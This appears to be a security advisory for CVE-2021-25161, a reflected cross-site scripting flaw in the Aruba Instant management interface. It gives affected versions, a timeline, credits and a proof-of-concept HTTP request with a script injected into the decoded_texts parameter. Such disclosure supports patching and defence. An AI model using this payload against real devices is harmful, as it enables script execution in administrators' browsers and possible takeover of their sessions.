Authenticated Reflected Cross-Site Scripting (cp_perview)

Aleph Research Advisory

Identifier

CVE-2021-25161

Severity

Moderate

Product

Aruba Instant

Vulnerable Versions

- Aruba Instant 6.4.x: 6.4.4.8-4.2.4.17 and below
- Aruba Instant 6.5.x: 6.5.4.18 and below
- Aruba Instant 8.3.x: 8.3.0.14 and below
- Aruba Instant 8.5.x: 8.5.0.11 and below
- Aruba Instant 8.6.x: 8.6.0.7 and below
- Aruba Instant 8.7.x: 8.7.1.1 and below

Technical Details

There is an authenticated reflected XSS in the management interface of Aruba Instant that can allow an unauthenticated attacker to trick a user of the interface and execute javascript on his browser.

POC:

GET /swarm.cgi?opcode=cp_preview&bg_color=AA&banner_color=B&banner_text=AAA&terms_of_use=AAA&use_policy=BBB&authenticated=False&decoded_texts=';%0Aalert("Test");//&sid=XXXXXXXXXXXXXXXXXXXX HTTP/1.1
Host: IP:4343
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https:// IP:4343/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: sid=XXXXXXXXXXXXXXXXXXXX

Timeline

09-Mar-21
: Public disclosure.
09-Mar-21
: Patch available.
03-Feb-21
: CVE-2021-25161 assigned.
22-Nov-20
: Reported.

Posts

Aruba in Chains: Chaining Vulnerabilities for Fun and Profit
By Itai Greenhut & Gal Zror,
15-Jul 2021

Credit

Itai Greenhut (@Gr33nh4t) of Aleph Research, HCL Technologies
Gal Zror (@waveburst) of Aleph Research, HCL Technologies

External References

Aruba Instant (IAP) Multiple Vulnerabilities